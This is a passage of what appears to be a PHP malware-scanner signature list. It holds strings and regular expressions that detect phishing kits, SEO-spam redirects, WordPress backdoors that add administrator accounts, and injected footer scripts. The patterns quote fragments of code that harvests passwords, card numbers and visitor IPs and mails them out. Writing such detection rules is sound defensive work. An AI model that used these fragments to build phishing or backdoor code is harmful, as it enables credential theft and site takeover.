	'serverjump' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.serverjump.001', '<IfModule mod_rewrite.c>\s*RewriteEngine On[^<]+HTTP_REFERER[^<]+google[^<]+bing[^<]+serverjump[^>]+jumpid[^<]+<.IfModule>'),
	'RewriteRule ^([A-Za-z0-9-]+).html$ story.php?hl=$1 [L]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.gopni3g.001', '(?:RewriteEngine On\s*)?RewriteRule \^\(\[A-Za-z0-9-\]\+\)\.html\$ story\.php\?hl=\$1 .L\]'),
	'RewriteRule ^([a-zA-Z0-9]+)-(.*)-([0-9]+)\.htm$ file.php?$1=$2-$3 [L]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect_gen.030', '(?:RewriteEngine On\s*)?RewriteRule \^\(\[a-zA-Z0-9\]\+\)\-\(\.\*\)\-\(\[0-9\]\+\).\.htm\$ file\.php\?\$1=\$2-\$3 .L\]'),
	'RewriteCond %{REQUEST_URI}%{QUERY_STRING} valium' => array(STR_CLEAR_MULTIMATCH, 'htaccess.malware.generic.011', 'RewriteEngine On[\s]*RewriteCond %\{HTTP_REFERER[^\[]+\[NC\][\s]*RewriteCond %\{REQUEST_URI\}%\{QUERY_STRING\} valium[^]]+\][\s]*RewriteRule \.\* http[^\]]+\]'),
	'RewriteRule ^info/(.*)$ wp-licence.php [L]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.wp-licence.001', 'RewriteCond \%{REQUEST_FILENAME} \!-d\sRewriteCond \%{REQUEST_FILENAME} \!-f\sRewriteRule \^\w+\/\(\.\*\)\$ wp-licence\.php \[L]'),
),

'Location:' => array(STR_TRIGGER,

	'header("Location:' => array(STR_TRIGGER,

		'fwrite($' => array(STR_TRIGGER,
			
			'getenv("REMOTE_ADDR' => array(STR_TRIGGER,

				'gethostbyaddr($' => array(STR_TRIGGER,
					'mail($' => array(STR_CLEARFILE, 'php.phishing.redirect.046', NULL),
				),

				'->geoplugin_countryCode' => array(STR_CLEARFILE, 'php.phishing.redirect.038', NULL),
			),
			
			'@json_decode(file_get_contents("http://ip-api.com' => array(STR_TRIGGER,
				'$RANDOMSTRING .= $CHARACTERS[rand(0, strlen($CHARACTERS) - 1)];' => array(STR_CLEARFILE, 'php.malware.cc_stealer.012', NULL),
			),

			'urlencode($messaggio);' => array(STR_TRIGGER,
				'@mail($pfw_email_to' => array(STR_CLEARFILE, 'php.phishing.mailer.127', NULL),
			),

			', $_SERVER[\'REMOTE_ADDR\'].\' \'.date(\'c\')."\n")' => array(STR_CLEAR_MULTIMATCH, 'php.phishing.generic.067', 'header\(.[Ll]ocation\s*:\s*https?:\/\/[^\)]+\)\s*;\s*(\$\w+)\s*=\s*fopen\(.\w+\.[^,]+,\s*.a.\s*\)\s*;\s*fwrite\(\1\s*,\s*\$_SERVER\[.REMOTE_ADDR.\]\..\s*.\.date\([^;]+;\s*fclose\(\1\)\s*;'),
			'$_SESSION[\'screen\']=$_POST[\'screen\'];$_SESSION[\'EML\']=$_POST[\'EML\'];$msg=' => array(STR_CLEARFILE, 'php.phishing.mailer.084', NULL),
			'fwrite($save,$code);fclose($save);exit(header("Location:' => array(STR_CLEARFILE, 'php.phishing.generic.074', NULL),
			'mail($userinfo,$subject,$data);' => array(STR_CLEARFILE, 'php.phishing.mailer.091', NULL),
			'$country = $details->country;' => array(STR_CLEARFILE, 'php.phishing.mailer.113', NULL),
			'CHASE_SPOX' => array(STR_CLEARFILE, 'php.phishing.generic.084', NULL),
			'echo "<script type=\'text/javascript\'>window.top.location=\'https://appleid.apple.com' => array(STR_CLEARFILE, 'php.phishing.apple.008', NULL),
		),

		'mail($' => array(STR_TRIGGER,

			'$ip = $_SERVER[\'REMOTE_ADDR\'];' => array(STR_TRIGGER,
				'$user = $_POST[' => array(STR_TRIGGER,
					'$pass = $_POST[' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.014', NULL),
				),
			),
				
			'From:Netflix' => array(STR_CLEARFILE, 'php.phishing.netflix.008', NULL),
			'From: Netflix' => array(STR_CLEARFILE, 'php.phishing.netflix.008.02', NULL),
			'correo.telefonica.net/cp/' => array(STR_CLEARFILE, 'html.phishing.telefonica.001.02', NULL),
		),

		'gethostbyaddr($_SERVER[' => array(STR_TRIGGER,

			'(strpos(strtolower($ExactBrowserNameUA)' => array(STR_TRIGGER,
				'header("Location:' => array(STR_CLEARFILE, 'php.phishing.mailer.126', NULL),
			),

			'(strripos($' => array(STR_TRIGGER,
				'HTTP/1.1 302 Found' => array(STR_CLEARFILE, 'php.spam-seo.redirect.134', NULL),
			),
		),

		'$message .= "IP:' => array(STR_TRIGGER,

			'getenv(' => array(STR_TRIGGER,
				'mail($' => array(STR_CLEARFILE, 'php.phishing.mailer.116', NULL),
			),

			'$country = visitor_country();' => array(STR_CLEARFILE, 'php.phishing.mailer.031', NULL),
		),

		'if(strpos($tmp, \'bot\') == false){' => array(STR_TRIGGER,
			'$content=gethttpcnt($website.stripslashes($_SERVER[\'QUERY_STRING\']));' => array(STR_TRIGGER,
				'header("Location: " . $oursite . $_SERVER["QUERY_STRING"]);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.052', NULL),
			),
		),

		'function sgen()' => array(STR_TRIGGER,
			'"abcdefghijklmnopqrstuvwxyz";' => array(STR_TRIGGER,
				'header("Location: ".$loc);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.102', NULL),
			),
		),

		'$cloakornotcloak=' => array(STR_TRIGGER,
			'$articlesvalue=' => array(STR_TRIGGER,
				'$maplinksraz=' => array(STR_CLEARFILE, 'php.spam-seo.injector.233', NULL),
			),
		),

		'$url = $urls[array_rand($urls)];' => array(STR_TRIGGER,
			'header("Location: http://$url");' => array(STR_TRIGGER,
				'echo "Loading...please wait";' => array(STR_CLEARFILE, 'php.spam-seo.redirect.061', NULL),
			),
		),

		'.$_SERVER[\'HTTP_REFERER\']."\n",  FILE_APPEND' => array(STR_TRIGGER,
			'if (filter_var(RC4::Decrypt($key, $val), FILTER_VALIDATE_EMAIL)' => array(STR_CLEARFILE, 'php.spam-seo.pornspam.006', NULL),
		),

		'if ($_COOKIE[\'wp_defined\'] != $passwordhash) {' => array(STR_TRIGGER,
			'str_replace("[BKEYWORD]", stripslashes($_POST[\'Title\']),' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.040', NULL),
		),
		
		'start.php?Libero=' => array(STR_TRIGGER,
			'header("Location: $redir");' => array(STR_CLEARFILE, 'php.phishing.libero.001', NULL),
		),

		'Card: ".$_SESSION[' => array(STR_TRIGGER,
			'header("Location: done.php");' => array(STR_CLEARFILE, 'html.phishing.netflix.005', NULL),
		),

		'$hash = md5($' => array(STR_TRIGGER,    
			'header("Location: login.php?&sessionid=$hash&securessl=true' => array(STR_CLEARFILE, 'php.phishing.generic.039', NULL),
		),

		'rand=13InboxLight' => array(STR_TRIGGER,
			'1774256418&fid' => array(STR_CLEARFILE, 'php.phishing.gmail.008', NULL),
		),

		'mail ($' => array(STR_TRIGGER,
			': $password' => array(STR_CLEARFILE, 'php.phishing.mailer.068', NULL),
		),

		'sgen()' => array(STR_TRIGGER,
			'bin2hex($_SERVER["HTTP_HOST"]);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.100', NULL),
		),

		'iPhone' => array(STR_TRIGGER,
			'@mail($to,' => array(STR_CLEARFILE, 'php.phishing.mailer.120', NULL),
		),

		'md5(time());' => array(STR_TRIGGER,
			'){if (!copy($' => array(STR_CLEARFILE, 'php.phishing.redirect.041', NULL),
		),

		'.html?cmd=_home&locale.x=en_US");' => array(STR_CLEARFILE, 'php.phishing.paypal.015', NULL),
		'include(\'blocker.php\')' => array(STR_CLEARFILE, 'php.phishing.generic.056', NULL),
		'+ Victim Information' => array(STR_CLEARFILE, 'php.phishing.mailer.064', NULL),
		'header("Location: signin.php?locale.x=".substr($' => array(STR_CLEARFILE, 'php.phishing.paypal.019', NULL),
		'.md5(rand(1,999))."&verification_dispatch=".base64_encode(md5(rand(' => array(STR_CLEARFILE, 'php.phishing.paypal.019.02', NULL),
		'by xIgOr' => array(STR_CLEARFILE, 'php.hacktool.mailer.102', NULL),
		'"====================+' => array(STR_CLEARFILE, 'php.phishing.mailer.077', 'NULL'),
		'$cl = explode( \'/\', $_GET[\'cl\'] );' => array(STR_CLEARFILE, 'php.phishing.office365.002', NULL),
		'personal.natwest.com' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.005', NULL),
		'$(\'.gone_bt\').click(function(){window.location.href="http' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.007', NULL),
		'.md5(base64_encode(rand(0,10000).gmdate(' => array(STR_CLEARFILE, 'php.phishing.block_bots.008', NULL),
		'$domain = substr(strrchr($login' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.011', NULL),
		'\$[\w]+[\s]*=[\s]*\$_POST\[.[\w]*.\];[^@]+\$[\w]+[\s]*=[\s]*.[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}.;[\s]*\$[\w]+[^;]+;[\s]*mail\(\$[\w]+[\s]*,\$[\w]+,[\s]*\$[\w]+\);[^:]+header\(..ocation:[\s]*[\w]+.[\w]+.\);' => array(REX_CLEARFILE, 'php.phishing.mailer.101', NULL),
		'header("Location:https://aol.com/uploads");' => array(STR_CLEARFILE, 'php.phishing.aol.002.02', NULL),
		'Created by TOPFUD.com' => array(STR_CLEARFILE, 'php.phishing.generic.089', NULL),
		'./index_0.html?login="' => array(STR_CLEARFILE, 'php.phishing.redirect.025', NULL),
		'header("Location: http://chase.com");' => array(STR_CLEARFILE, 'html.phishing.chase.001.005', NULL),
		'header("Location: restore.html?appId=' => array(STR_CLEARFILE, 'html.phishing.apple.001.002', NULL),
		'header("Location: finish.html?appId=' => array(STR_CLEARFILE, 'html.phishing.apple.001.003', NULL),
		'header("Location: http://www.chase.com/' => array(STR_CLEARFILE, 'html.phishing.chase.001', NULL),
		'header("Location: https://www.chase.com' => array(STR_CLEARFILE, 'html.phishing.chase.005', NULL),
		'header("Location: http://www.apple.com' => array(STR_CLEARFILE, 'html.phishing.apple.001.007', NULL),
		'header("Location: sign_in.html?appId' => array(STR_CLEARFILE, 'html.phishing.apple.001.008', NULL),
		'header("Location: restore.php?appId=' => array(STR_CLEARFILE, 'html.phishing.apple.001.009', NULL),
		'header("Location:http://vip.163.com/"' => array(STR_CLEARFILE, 'html.phishing.163_com.001', NULL),
		'header("Location: http://www.paypal.' => array(STR_CLEARFILE, 'html.phishing.paypal.004', NULL,1),
		'header("Location:  http://mail.yahoo.com' => array(STR_CLEARFILE, 'php.phishing.yahoo.002', NULL),
		'header("Location: https://www.axabanque' => array(STR_CLEARFILE, 'php.phishing.AXA.001', NULL),
		'header("Location: http://www.nordea.dk' => array(STR_CLEARFILE, 'php.phishing.nordea.001', NULL),
		'header("Location: https://service.barclays.de' => array(STR_CLEARFILE, 'php.phishing.barclays.001', NULL), 
		'header("Location: https://banking.postbank.de' => array(STR_CLEARFILE, 'php.phishing.postbank.002', NULL),
		'header("Location: https://www.halifax-online.co.uk/personal/logon/login.jsp");' => array(STR_CLEARFILE, 'php.phishing.halifax.003', NULL),
		'header("Location: https://onlinebanking.huntington.com/rol/Misc' => array(STR_CLEARFILE, 'php.phishing.huntington.001', NULL),
		'header("Location: http://www.rbc.com/' => array(STR_CLEARFILE, 'php.phishing.rbc.001', NULL),
		'header("Location: https://www.usbank.com/online-banking/' => array(STR_CLEARFILE, 'php.phishing.usbank.002', NULL),
		'"Location:http://mail.163.com/"' => array(STR_CLEARFILE, 'html.phishing.163_com.002', NULL),
		'"Location:http://mail.126.com/"' => array(STR_CLEARFILE, 'html.phishing.126_com.001', NULL),
		'header("Location: Billing.php?action=billing_verification=true&_session;".md5(time()).md5(time()));' => array(STR_CLEARFILE, 'php.phishing.amazon.002', NULL),
		'$vName = base64_encode($_GET["sec"]);$nName = base64_encode($_GET["token"]);header("Location: \'.$urlz' => array(STR_CLEARFILE, 'php.phishing.generic.015', NULL),
		'header("Location: $dst?login=$login&.verify?service=mail&data:text/html;charset=utf-8;base64,' => array(STR_CLEARFILE, 'php.phishing.mailer.054', NULL),
		'fwrite($file,$ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n");' => array(STR_CLEARFILE, 'php.phishing.redirect.013', NULL),
		'= html_x_http_request(' => array(STR_CLEARFILE, 'php.spam-seo.jp-list.001', NULL),
		'header("Location: InitialTangerine.php");' => array(STR_CLEARFILE, 'php.phishing.generic_redirect.002', NULL),
		'header("Location: https://www.tangerine.ca' => array(STR_CLEARFILE, 'php.phishing.generic_redirect.002.02', NULL),
		'\t{20}header\("Location:[^;]+?;' => array(REX_CLEAR_LINEMATCH, 'php.spam-seo.header_location.025', '\t{20}header\("Location:[^;]+?;'),
		'||~~ BY ~~ Zayan_bouch' => array(STR_CLEARFILE, 'php.phishing.ZayanBounch.001', NULL),
		'if ( get_current_user_id() !=' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.015', 'if\s*\(\s*get_current_user_id\(\)\s*\!=\s*[\'"]\d+[\'"]\s*\)\s*{\s*header\("Location:\s*http[^\)]+\)\s*;\s*}'),
		'--+ Godaddy True Login Verified  +--' => array(STR_CLEARFILE, 'php.phishing.godaddy.003.02', NULL),
		'header("Location: https://www.emiratesnbd.com' => array(STR_CLEARFILE, 'php.phishing.mailer.082', NULL),
		'xcazanova' => array(STR_CLEARFILE, 'php.phishing.generic.077', NULL),
		'include("system.php");' => array(STR_CLEARFILE, 'php.phishing.include.002', NULL),
		'$mesaj = "IP: $ip | First Name: $fname' => array(STR_CLEARFILE, 'php.phishing.mailer.099', NULL),
		'"Location:http://webmail.mail.126.com/"' => array(STR_CLEARFILE, 'php.phishing.126_com.001', NULL),
		'header("Location: https://www.bbva.com.co/")' => array(STR_CLEARFILE, 'html.phishing.bbva.004.02', NULL),
		'WeTransfer Plus' => array(STR_CLEARFILE, 'php.phishing.wetransfer.002', NULL),
	),

	'eader(\'Location: ' => array(STR_TRIGGER,

		'header(\'Location: http:' => array(STR_TRIGGER,

			'.su/?tr=' => array(STR_TRIGGER,
				'exit;' => array(STR_CLEARFILE, 'php.malware.su_redirect.001', NULL),
			),

			'$red_code = "<?php\nheader(\'Location: http:' => array(STR_TRIGGER,
				'.docm\');\n?>";' => array(STR_CLEARFILE, 'php.hacktool.doc_redirector_installer.001', NULL),
			),

			'--/' => array(STR_TRIGGER, //modified by PG to avoid FPs
				'exit();' => array(STR_CLEARFILE, 'php.spam-seo.redirect.057', NULL),
			),

			'header(\'Location: http://www.serverjump.com' => array(STR_CLEARFILE, 'php.spam-seo.serverjump.001', NULL),
			'.docm\');' => array(STR_CLEAR_LINEMATCH, 'php.malware.doc_redirector.001', '\bheader\(.Location: http:\/\/[^\'\);]+?.docm\'\);'),
			'base64_encode($_SERVER[\'REQUEST_URI\'].' => array(STR_CLEARFILE, 'php.phishing.redirect.029', NULL),
			'echo("<h1>404 Not Found</h1>The page that you have requested could not be found.");}}if(!empty($_SERVER[\'HTTP_USER_AGENT\'])){' => array(STR_CLEARFILE, 'php.phishing.block_bots.004', NULL),
			'if (preg_match(\'/\' . $ip . \'/\',$_SERVER[\'REMOTE_ADDR\']))' => array(STR_CLEARFILE, 'php.phishing.block_bots.005', NULL),
		),

		'$urls = array (' => array(STR_TRIGGER,
			'shuffle($urls);' => array(STR_TRIGGER,
				'header(\'Location: \'.trim($urls[' => array(STR_CLEARFILE, 'php.spam-seo.redirect.062', NULL),
			),
		),

		'{header(\'Location: ..' => array(STR_TRIGGER,
			'$fp=fopen($_POST[\'path\'],' => array(STR_TRIGGER,
				'{echo \'ok\';' => array(STR_CLEARFILE, 'php.backdoor.uploader.229', NULL),
			),
		),

		'Header(\'Location: \'.$li);' => array(STR_TRIGGER,
			'$lin=$_GET["link"];' => array(STR_CLEARFILE, 'php.spam-seo.redirect.031', NULL),
		),

		'header(\'Location: \' . $index);' => array(STR_TRIGGER,
			'$index="file.php?id=$file";' => array(STR_CLEARFILE, 'php.malware.component.006', NULL),
		),

		'header(\'Location: mail.php?main_domain=\'.$' => array(STR_TRIGGER,
			'= \'http://mail.\'.$' => array(STR_CLEARFILE, 'php.phishing.mail_provider_validator.001', NULL),
		),

		'mail(' => array(STR_TRIGGER,
			'$VictimInfo1 = "| Submitted' => array(STR_CLEARFILE, 'php.phishing.mailer.093', NULL),
		),

		'$size = count($addresses);' => array(STR_TRIGGER,
			'$randomUrl = $addresses[$randomIndex];' => array(STR_CLEARFILE, 'php.malware.redirect.048', NULL),
		),

		'action="<?php echo "$webscr/?cmd=_login-submit' => array(STR_CLEARFILE, 'php.phishing.redirect.019', NULL),
		'SCAM PAGE PPL V5' => array(STR_CLEARFILE, 'php.phishing.dreambig.001', NULL),
		'action="details.php?&sessionid=<?php echo $hash; ?>&securessl=true" method="POST"' => array(STR_CLEARFILE, 'php.phishing.generic.062', NULL),
		'require "../protect.php"' => array(STR_CLEARFILE, 'php.phishing.generic.063', NULL),
		'$_SESSION[\'justowner\'] = \'green\';' => array(STR_CLEARFILE, 'php.phishing.generic_redirect.003', NULL),
		'@hotmail.\') !== false || stripos($domain_check, \'@outlook' => array(STR_CLEARFILE, 'php.phishing.generic_redirect.004', NULL),
		'elseif($x != "" AND $_GET[\'page\']==\'mobiNet' => array(STR_CLEARFILE, 'php.phishing.generic.088', NULL),
		'explode(\'@\', $email);' => array(STR_CLEARFILE, 'html.phishing.generic.100.02', NULL),
	),

	'$ip = getenv("REMOTE_ADDR");' => array(STR_TRIGGER,
		'header("Location: http://www.netflix.' => array(STR_CLEARFILE, 'php.phishing.netflix.006', NULL),
		'header("Location: finished.html?dispatch=' => array(STR_CLEARFILE, 'php.phishing.script.006', NULL),
		'header("Location: https://drive.google.com' => array(STR_CLEARFILE, 'php.phishing.mailer.087', NULL),
	),

	'header ("Location: http' => array(STR_TRIGGER,
		'&c=wl_con' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.redirect_wl_con.001', 'header\s*\(.Location: http:..[^\/]+\/\?a=\d{5,}&c=wl_con[^\)]+\);'),
	),

	'Exp: ".$_POST[' => array(STR_TRIGGER,
		'function validate_cc_number($cc_number)' => array(STR_CLEARFILE, 'php.phishing.script.005', NULL),
	),

	'if(strtolower($URIRedirect)=="/index.php")' => array(STR_TRIGGER,
		'$wp_did_header' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.045', 'if .strtolower.._SERVER..SERVER_NAME...\!=[^\)]+\)\s*\{\s*\$URIRedirect=\$_SERVER\[[^\]]+\];\s*if.strtolower..URIRedirect.==..index.php..\s*\{[^\(\{]+header..HTTP.1.1 301[^\}]+\}'),
	),

	'if (wordsFound(preg_quote(urldecode($referer' => array(STR_CLEARFILE, 'php.spam-seo.redirect.051', NULL),
	'$location = "http://best-canadian-pills.rx-medical.com' => array(STR_CLEARFILE, 'php.spam-seo.redirect.001.021', NULL),
	'if($_GET[\'mode\']==\'config\'){echo' => array(STR_CLEARFILE, 'php.spam-seo.redirect.001.020', NULL),
	'$settings[\'url\']=file_get_contents($geturl);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.001.022', NULL),
	'/bmo-canada-billing/' => array(STR_CLEAR_MULTIMATCH, 'php.phishing.redirect.021', '(?:ini_set\s*\(\s*["\']display_errors[^;]+?;\s*)?(?:\$\w+\s*=\s*(?:md5\s*\(\s*)?rand[^;]+?;\s*)*header\s*\(\s*["\']Location:https?:\/\/(?:[^\/;]+?\/){1,10}bmo-canada-billing\/[^;]+?;'),
	'Location: https://gmail.com' => array(STR_CLEARFILE, 'php.phishing.gmail.001', NULL),
	'header("Location: $secfile?' => array(STR_CLEARFILE, 'php.phishing.mailer.049.08', NULL),
	'htm?https://login.verizonwireless.com' => array(STR_CLEARFILE, 'html.phishing.verizon.001.003', NULL),
	'(\$\w+)\s*=\s*[\'"]http:\/\/[^;]+;\s*[Hh]eader\s*\(\s*[\'"]\s*[Ss]tatus\s*:\s*(?:301|302|403|404)[^;]+;\s*[Hh]eader\s*\([\'"][Ll]ocation\s*:\s*[\'"]\s*\.\s*\1\s*\)\s*;' => array(REX_CLEAR_MULTIMATCH, 'php.location_refresh.003', '(\$\w+)\s*=\s*[\'"]http:\/\/[^;]+;\s*[Hh]eader\s*\(\s*[\'"]\s*[Ss]tatus\s*:\s*(?:301|302|403|404)[^;]+;\s*[Hh]eader\s*\([\'"][Ll]ocation\s*:\s*[\'"]\s*\.\s*\1\s*\)\s*;'),
	'$handle = fopen("log.txt", "a");' => array(STR_CLEARFILE, 'html.phishing.facebook.007', NULL),
	'$handle = fopen("./logs.txt", "a");' => array(STR_CLEARFILE, 'php.phishing.instagram.001', NULL),
	'$URL = $urls[rand(0, count($urls) - 1)];' => array(STR_CLEARFILE, 'php.malware.redirect.018', NULL),
),

'action' => array(STR_TRIGGER,

	'add_action(' => array(STR_TRIGGER,
	
		'add_action(\'init' => array(STR_TRIGGER,
	
			'$user->set_role( \'administrator\' );' => array(STR_TRIGGER,
	
				'$pass = \'' => array(STR_TRIGGER,
					'function [\w]*admin_account\(\)[\s]*\{[\s]*\$user[^;]+;[\s]*\$pass[^;]+;[\s]*\$email[^;]+;[\s]*if' => array(REX_CLEAR_MULTIMATCH, 'php.hacktool.wp_users.004', 'function ([\w]*admin_account)\(\)[\s]*\{[\s]*\$user[\s]*=[\s]*[^;]+;[\s]*\$pass[\s]*=[\s]*[^;]+;[\s]*\$email[^;]+;[\s]*if[^}]+[\}\s]*add_action\([^;]+\1.\);'),
				),
	
				'new WP_User' => array(STR_TRIGGER,
					'function[\s]*[\w]+\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*.[\w]+.;[^\{]+!username_exists\([\s]*\$[\w]+[\s]*\)[\s]*\&\&[\s]*!email_exists\([\s]*\$' => array(REX_CLEAR_MULTIMATCH, 'php.hacktool.wp_users.016', 'function[\s]*[\w]+\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*.[\w]+.;[^\{]+!username_exists\([\s]*\$[\w]+[\s]*\)[\s]*\&\&[\s]*!email_exists[^;]+;[\s]*\$[\w]+[\s]*=[\s]*new[\s]*WP_User[^\}]+\$user->set_role\([\s]*.administrator.[^\}]+[\s\}]+[\s]*add_action\(.init.,[^;]+\);'),
				),
			),
	
			'wp_create_user(' => array(STR_TRIGGER,
				'!username_exists($username)' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.027', 'add_action\(.init.[^\{]+function[\s]*[\w]+\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*.[\w]+.;[\s]*\$[\w]+[\s]*=[\s]*.[\w]+.;[\s]*\$[\w]+[\s]*=[^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*wp_create_user\([\s]*\$[\w]+,[\s]*\$[\w]+,[\s]*\$[\w]+\);[\s]*if[\s]*\([\s]*is_int\(\$[\w]+\)[\s]*\)[\s]*\{[\s]*\$wp_user_object[\s]*=[\s]*new[\s]*WP_User[^\{]+add_action\(.init.,[^\{]+function[\s]*[\w]+\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*\$_GET\[.[\w]+.\];[^\}]+do_action\(.wp_login[^\}]+exit;[\s]*\}[\s]*}'),
			),
	
			'unserialize(get_option(\'default_pages' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.180', 'add_action\(.init.,[\s]*create_function\(..,[^\)]*@assert\(implode\([^\n]+\);'),
			'@assert(get_option(' => array(STR_CLEAR_LINEMATCH, 'php.malware.create_function.006', 'add_action\([\'"]init[\'"],\s*create_function\s*\([\'"]{0,2}\s*,\s*[\'"]\s*@assert\(get_option\([\'"]\w*cache[\'"]\)\);[\'"]\)\)\s*;'),
			'$content .= \'<div><a href="\' . get_the_title($link) . \'">\' . trim(get_post_field(\'post_content\', $link)) . \'</a></div>\';' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.017', NULL),
			'wp_create_user\([\s]*\$[\w]+,[\s]*\$[\w]+,[\s]*\$[\w]+[\s]*\);[\s]*\$[\w]+[\s]*=[\s]*get_user_by\([^\}]+add_role\([\s]*.administrator.[\s]*\);[\s]*\}[\s]*\}' => array(REX_CLEAR_MULTIMATCH, 'php.hacktool.wp_users.014', 'add_action\(.init.,[\s]*.[\w]+.\);[\s]*function[\s]*[\w]+\(\)[\s]*\{[\s]*\$[^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*wp_create_user\([\s]*\$[\w]+,[\s]*\$[\w]+,[\s]*\$[\w]+[\s]*\);[\s]*\$[\w]+[\s]*=[\s]*get_user_by\([^\}]+add_role\([\s]*.administrator.[\s]*\);[\s]*\}[\s]*\}'),
			'add_filter( \'pre_option_blogname\', \'' => array(STR_CLEARFILE, 'php.malware.injector.089', NULL),
		),

		'add_action(\'wp_footer' => array(STR_TRIGGER,
	
			'file_get_contents' => array(STR_TRIGGER,
				'function[\s]*[\w]*\(\)[\s]*\{[^\(]+if\(\$[\w]+[\s]*==[\s]*\$[\w]*\)\{[\s]*\$[\w]*[\s]*=[\s]*file_get_contents\(.[^\)]+\);[\s]*echo[\s]*\$[\w]*;' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.injector.295', 'function[\s]*[\w]*\(\)[\s]*\{[^\(]+if\(\$[\w]+[\s]*==[\s]*\$[\w]*\)\{[\s]*\$[\w]*[\s]*=[\s]*file_get_contents\(.[^\)]+\);[\s]*echo[\s]*\$[\w]*;[^,]+\}[\s]*add_action\(.[\w]+.,[\s]*.[\w]+.\);'),
			),
			
			'@file_get_contents(ABSPATH.\'wp-' => array(STR_TRIGGER,
				'if(!isset($_COOKIE[\'wordpress_cf_adm_use_adm\']) && !is_user_logged_in' => array(STR_CLEARFILE, 'php.malware.adinjection.003', NULL),
			),
	
			'<script>if (!!window.chrome && !!window.chrome.webstore){function' => array(STR_TRIGGER,
				'(){document.getElementById(\'popup-container\').style.display=\'block\';document.getElementById(\'' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.057', 'function ([\w]+)\(\)[\s]*\{[\s]*echo[\s]*[\'"][\s]*<script>if \(!!window\.chrome && !!window\.chrome\.webstore\)[\s]*\{[\s]*function[\s]*[\w]+\(\)[\s]*\{search[\s]*=[\s]*unescape\(.%[^\!]+!!window\.chrome[^>]+<.script>[^}]+\}[\s]*add_action\(.wp[^,]+,[\s]*.\1.\);'),
			),
	
			'wp_remote_retrieve_body(wp_remote_get(' => array(STR_TRIGGER,
				'PHP_INT_MAX' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.075', 'if[\s]*\(!function_exists\(.[\w]+.\)\)[\s]*\{[\s]*function[\s]*[\w]+\(\)[\s]*\{[\s]*if[\s]*\(function_exists\(.[\w]+.\)[\s]*&&[\s]*function_exists\(.[\w]+.\)[^\{]+\{[\s]*if[\s]*\(function_exists\(.str_rot13.\)[\s]*&&[\s]*function_exists\(.strrev.\)\)[\s]*foreach\(\$[^\}]+\)\)\);[\s]*break;[\s]*\}[^\}]+\}[\s]*function[\s]*[\w]+\(\)[\s]*\{[\s]*echo[\s]*[\w]+\(\);[\s]*\}[^\}]+return[\s]*\$[\w]+;[\s]*\}[^\}]+add_action\(.wp_[\w]+.,[\s]*.[\w]+.\);[\s]*\}[\s]*\}[\s]*add_action\(.[\w]+.,[\s]*.[\w]+.\);[\s]*\}'),
			),
	
			'<param name="allowscriptaccess" value="always"></param><param name="menu" value="false"></param>' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.044', 'add_action\([\'"]wp_footer[\'"],\s*[\'"]\w+[\'"]\);\s*function\s*\w+\(\)\s*{[^;]+;\s*\$\w+\s*=\s*get_option\([\'"]siteurl["\']\);\s*if\s*\(strstr\(\$\w+,\s*.a.\)\)\s*{[^<]+echo\s*.<object\s*type\s*=\s*.application.x-shockwave-flash.\s*data\s*="[^"]+"\s*width=.1.\s*height=.1.><param\s*name=.\w+.\s*value\s*=\s*[^>]+><.param><param\s*name\s*=\s*.allowscriptaccess.\s*value\s*=\s*.always.>\s*<.param><param\s*name\s*=\s*.menu.\s*value\s*=\s*.false.><.param>\s*<param\s*name\s*=\s*.wmode.\s*value\s*=\s*.transparent.>[^;]+;\s*echo\s*.<a\s*href[^;]+;\s*echo\s*\$\w+;\s*echo[^;]+;\s*echo\s*\$\w+;[^;]+;\s*echo[^;]+;\s*}'),
			'add_action(\'wp_footer\', \'wp_func_jquery\')' => array(STR_CLEAR_MULTIMATCH, 'php.injected.fake_wp_jquery.001', 'if[\s]*\([\s]*!function_exists\(.wp_func_jquery.\)\)[\s]*\{[\s]*(if[\s]*\([\s]*!current_user[^\:]+\{[\s]*)?function wp_func_jquery\(\)[\s]*\{[^\}]+echo\([\s]*wp_remote[^\}]+[\s\}]+(if[\s]*\(rand[^\{]+\{[\s]*add_action[^\}]+\}[\s]*else[\s]*\{[\s]*)?add_action\([^;]+\);[\s]*\}[\s]*\}?[\s]*(function wp_func_min\(\)[\s]*\{[^\}]+\}[\s]*add_action[^\}]+;[\s]*\})?'),
			'(){echo\'<script type="text/javascript">var ' => array(STR_CLEAR_MULTIMATCH, 'php.injected.wp_footer_script.001', 'function (\w+)\(\)\{echo.<script type=.text.javascript.>var \w+=\[(\d{3},){150,}\d{3}\];var[^\/]+?document.write\(\w+\);<.script>.;}\s*add_action..wp_footer.,\1\);'),
			'$agent_match = preg_match("~(Googlebot|Mediapartners|' => array(STR_CLEARFILE, 'php.spam-seo.injector.132', NULL), 
